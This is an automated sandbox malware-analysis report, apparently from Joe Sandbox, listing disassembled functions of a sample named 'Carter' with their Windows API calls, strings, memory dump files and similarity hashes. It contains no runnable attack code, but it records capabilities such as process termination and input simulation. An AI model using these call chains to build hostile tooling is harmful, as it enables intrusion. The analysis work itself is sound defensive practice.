Opcode Fuzzy Hash: c67af19a75d39f0db6d68b09e46e7344b1cbb029a312d2381fbd7b264e670636
Instruction Fuzzy Hash: 0C1186B115021DBEEF159F60CC85EEB7F5DEF08798F018215BB18A6050CB719C21DBA4

Function 00C141B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C14282,?), ref: 00C141D3
GetProcAddress.KERNEL32(00000000), ref: 00C141DA
EncodePointer.KERNEL32(00000000), ref: 00C141E6
DecodePointer.KERNEL32(00000001,00C14282,?), ref: 00C14203

Strings

RoInitialize, xrefs: 00C141C2
combase.dll, xrefs: 00C141CE

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: ea295e7044edaa1ef995c6447fbf1a678a4aff1eff91b6fd1cfec9127c81b329
Instruction ID: 6462b000c8dec26fa84d10d0a2ef5214fa2833facd0813285cf066cf8080352e
Opcode Fuzzy Hash: ea295e7044edaa1ef995c6447fbf1a678a4aff1eff91b6fd1cfec9127c81b329
Instruction Fuzzy Hash: 17E01A71690751BFDF902B78EC4DB4C3664BB11B0AF704524F411E50F0DBB545889F08

Function 00C1428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C141A8), ref: 00C142A8
GetProcAddress.KERNEL32(00000000), ref: 00C142AF
EncodePointer.KERNEL32(00000000), ref: 00C142BA
DecodePointer.KERNEL32(00C141A8), ref: 00C142D5

Strings

combase.dll, xrefs: 00C142A3
RoUninitialize, xrefs: 00C14297

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: ebeccb0e6873d90f4fa144e0443bcf37967464da4d7dc85761c62a224b5659c5
Instruction ID: 55eab33fe3a35b47a15b8a62fae7a4c1d415733c9e1588312b8334c553dc191e
Opcode Fuzzy Hash: ebeccb0e6873d90f4fa144e0443bcf37967464da4d7dc85761c62a224b5659c5
Instruction Fuzzy Hash: B5E0EC71650700AFDB91AF64ED0DB4C3A68BB01B16F604229F011E51F0CBB44688DB18

Function 00BF218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00BF21B8
GetWindowRect.USER32(?,?), ref: 00BF21F9
ScreenToClient.USER32(?,?), ref: 00BF2221
GetClientRect.USER32(?,?), ref: 00BF2350
GetWindowRect.USER32(?,?), ref: 00BF2369

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: ae44e574a204feb860f1832d986dcdd64d662e10a5c3a2415b04732e83dda314
Instruction ID: c15d910aaaa822169ee67191f32d8099cd67e3277720754bebf47ea8c376868e
Opcode Fuzzy Hash: ae44e574a204feb860f1832d986dcdd64d662e10a5c3a2415b04732e83dda314
Instruction Fuzzy Hash: 8AB15A79900249DBDF10CFA8C9807EEB7F1FF08310F148169EE59AB654EB34AA54CB64

Function 00C56A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C56BC6
_memmove.LIBCMT ref: 00C56B01

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

_memmove.LIBCMT ref: 00C56B74
_memmove.LIBCMT ref: 00C56C5B
_memmove.LIBCMT ref: 00C56C74
_memmove.LIBCMT ref: 00C56C90

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
Instruction ID: c8f3c56a1ef98b0e7751547be66117e8ea0a4ab7d1a615052734a7951a7af23d
Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
Instruction Fuzzy Hash: 2061D13450025AABCF11EF60CC82EFE37A8EF05308F444599FD595B292DB34AD99EB54

Function 00C70844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7040D,?,?), ref: 00C71491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C70980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C709A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C709EC
RegCloseKey.ADVAPI32(00000000), ref: 00C709F9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 0e1980bec971e67817c261f67fe2302ea4e2630f3d36eb74292ebcb93edc12a6
Instruction ID: 78e3e61587b55957e0062323edd6a1b4a2aac77a1ead246e85065885119a83cd
Opcode Fuzzy Hash: 0e1980bec971e67817c261f67fe2302ea4e2630f3d36eb74292ebcb93edc12a6
Instruction Fuzzy Hash: 59515831208204AFD714EF64C885E6FBBE9FF85314F14891DF999872A2DB31E905DB52

Function 00C75DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00C75E38
GetMenuItemCount.USER32(00000000), ref: 00C75E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00C75E97
GetMenuItemID.USER32(?,?), ref: 00C75F06
GetSubMenu.USER32(?,?), ref: 00C75F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00C75F65

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 5f1cd1b1846501169a19afcb0269f87dd05b58fd827b24dec1bafdd09b04635d
Instruction ID: 6e029436fcc82b7e43638126fd87cf916c85d0ee9009944091e60b7f030c9ca2
Opcode Fuzzy Hash: 5f1cd1b1846501169a19afcb0269f87dd05b58fd827b24dec1bafdd09b04635d
Instruction Fuzzy Hash: FD51A035A00619AFDB11EFA4C845AAEB7B5EF48310F1080A9FD15BB391CB74AE41DB94

Function 00C4F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C4F6A2
VariantClear.OLEAUT32(00000013), ref: 00C4F714
VariantClear.OLEAUT32(00000000), ref: 00C4F76F
_memmove.LIBCMT ref: 00C4F799
VariantClear.OLEAUT32(?), ref: 00C4F7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C4F814

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: b0eb6ff8a94610a600eaf126227394dbfcc7aecd9700d67539e810227281235f
Instruction ID: 0cd256b2bf1edafc28375a1babb248ed3a6cda48b8c070b9e30e6861cf9aa5be
Opcode Fuzzy Hash: b0eb6ff8a94610a600eaf126227394dbfcc7aecd9700d67539e810227281235f
Instruction Fuzzy Hash: F6513AB5A00209EFDB14CF58C884AAAB7B8FF4C354B15856AED59DB301D734E952CFA0

Function 00C529B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C529FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C52A4A
IsMenu.USER32(00000000), ref: 00C52A6A
CreatePopupMenu.USER32 ref: 00C52A9E
GetMenuItemCount.USER32(000000FF), ref: 00C52AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C52B2D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: cf9215d5c1ef8fcb5f9529365452f9c06d99dc10f6c6197743f86a9045d3e8fd
Instruction ID: fc780eafa9cadc41a9a3f6ae3d72307956bc17a7434e661c4988b5346911ff4f
Opcode Fuzzy Hash: cf9215d5c1ef8fcb5f9529365452f9c06d99dc10f6c6197743f86a9045d3e8fd
Instruction Fuzzy Hash: 4651E474600349DFDF25CF68C888BAEBBF5EF06316F104119EC229B291D7709A88DB59

Function 00BF1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00BF1B76
GetWindowRect.USER32(?,?), ref: 00BF1BDA
ScreenToClient.USER32(?,?), ref: 00BF1BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BF1C08
EndPaint.USER32(?,?), ref: 00BF1C52

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 4e3a4534d8092baad175e66e3318bd50afa437bd6300cedbbad5c7e0e57ca560
Instruction ID: deefc3d6d2c51ef71b727068985237e965714d8eef08a29020222e3b89529d1e
Opcode Fuzzy Hash: 4e3a4534d8092baad175e66e3318bd50afa437bd6300cedbbad5c7e0e57ca560
Instruction Fuzzy Hash: 2241C430104304EFD711DF28DCC8FBA7BE8EB55360F140AA9FA559B2A1C7319949DB61

Function 00C67788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00C6550C,?,?,00000000,00000001), ref: 00C67796

Part of subcall function 00C6406C: GetWindowRect.USER32(?,?), ref: 00C6407F

GetDesktopWindow.USER32 ref: 00C677C0
GetWindowRect.USER32(00000000), ref: 00C677C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C677F9

Part of subcall function 00C557FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C55877

GetCursorPos.USER32(?), ref: 00C67825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C67883

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 01e0e1631798e9b7bbe8a3fdd9873fc3913c46a45d47f62de9dace83ba31cf5c
Instruction ID: 4997473ccb77d231719d6741e188fd5ae93d96d15aca28aa37dae58b65f78673
Opcode Fuzzy Hash: 01e0e1631798e9b7bbe8a3fdd9873fc3913c46a45d47f62de9dace83ba31cf5c
Instruction Fuzzy Hash: 5231B272508305ABD720DF14D849F9FB7A9FF88314F100919F995A7191DB31EA48CBA6

Function 00C49431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C48CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C48CDE
Part of subcall function 00C48CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C48CE8
Part of subcall function 00C48CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C48CF7
Part of subcall function 00C48CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C48CFE
Part of subcall function 00C48CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C48D14

GetLengthSid.ADVAPI32(?,00000000,00C4904D), ref: 00C49482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C4948E
HeapAlloc.KERNEL32(00000000), ref: 00C49495
CopySid.ADVAPI32(00000000,00000000,?), ref: 00C494AE
GetProcessHeap.KERNEL32(00000000,00000000,00C4904D), ref: 00C494C2
HeapFree.KERNEL32(00000000), ref: 00C494C9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: c439b9acaa3004f38e3c766f11d059249334d3ca83c587d357e3aafcd36c82c2
Instruction ID: 04cc445d192cef950a990d38c72af608848f875f27047f3b096e12f7ef268ddd
Opcode Fuzzy Hash: c439b9acaa3004f38e3c766f11d059249334d3ca83c587d357e3aafcd36c82c2
Instruction Fuzzy Hash: 3111BE32501614FFDB509FA4CC49BAF7BA9FF46326F208058F84697250C73A9A06CB60

Function 00C491CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C49200
OpenProcessToken.ADVAPI32(00000000), ref: 00C49207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C49216
CloseHandle.KERNEL32(00000004), ref: 00C49221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C49250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00C49264

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: f17ad83d40e2e0f0446dd55e3a7b23ff8ce6e68d2e12fbbcb702efc58a8512eb
Instruction ID: a7fa85a224bb09c15daf5edc13c09896653a68e37d8a95477d4494013b1d4943
Opcode Fuzzy Hash: f17ad83d40e2e0f0446dd55e3a7b23ff8ce6e68d2e12fbbcb702efc58a8512eb
Instruction Fuzzy Hash: C111447250120AABDF518FA4ED49BDE7BA9FF48304F144024FA05A2160C3729E64EB60

Function 00C4C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C4C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C4C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4C366
ReleaseDC.USER32(00000000,00000000), ref: 00C4C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C4C385
MulDiv.KERNEL32(000009EC,?,?), ref: 00C4C397

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: e556cf1dc285f598bc5c01b191ad51070348403e4fbaa3605f44b4d79a6c7256
Instruction ID: ec8aed2a87b7e0bb062319612c9275fd01c2ff890aabd2b5a0630ef0f426db0b
Opcode Fuzzy Hash: e556cf1dc285f598bc5c01b191ad51070348403e4fbaa3605f44b4d79a6c7256
Instruction Fuzzy Hash: 2E014475E01218BBEF509FA59C49B9EBFB8EF48761F104065FE04AB290D6709D14CFA4

Function 00C7C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00BF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1729
Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1738
Part of subcall function 00BF16CF: BeginPath.GDI32(?), ref: 00BF174F
Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00C7C57C
LineTo.GDI32(00000000,00000003,?), ref: 00C7C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C7C59E
LineTo.GDI32(00000000,00000000,?), ref: 00C7C5AE
EndPath.GDI32(00000000), ref: 00C7C5BE
StrokePath.GDI32(00000000), ref: 00C7C5CE

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: b98cd4c1f7c79a5c13e6c9def03e1882b988d85cc11509d015cb93708ae02021
Instruction ID: 28cdefc6148e9d81d36f9b29be474569bccc88a1af454dc8c921a7a8ab84de52
Opcode Fuzzy Hash: b98cd4c1f7c79a5c13e6c9def03e1882b988d85cc11509d015cb93708ae02021
Instruction Fuzzy Hash: 4C110C7200010DBFDB529F90DC88FAE7FADEF04354F148555BE185A1A0C771AE59EBA0

Function 00C107BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C107EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00C107F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C107FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C1080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00C10812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C1081A

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 7c8fef8737a74a5f1c15b0b1e13be2f3eed0fd66e8a7a3d0e29ff71f14f99593
Instruction ID: 5f0bec7ec6513a1ff7f9664e147816c0bad4a3c9444986f3c3b19bc73722a9df
Opcode Fuzzy Hash: 7c8fef8737a74a5f1c15b0b1e13be2f3eed0fd66e8a7a3d0e29ff71f14f99593
Instruction Fuzzy Hash: EA016CB09017597DE3008F5A8C85B56FFB8FF59354F00411BA15C47941C7F5A868CBE5

Function 00C559A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C559B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C559CA
GetWindowThreadProcessId.USER32(?,?), ref: 00C559D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C559E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C559F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C559F9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
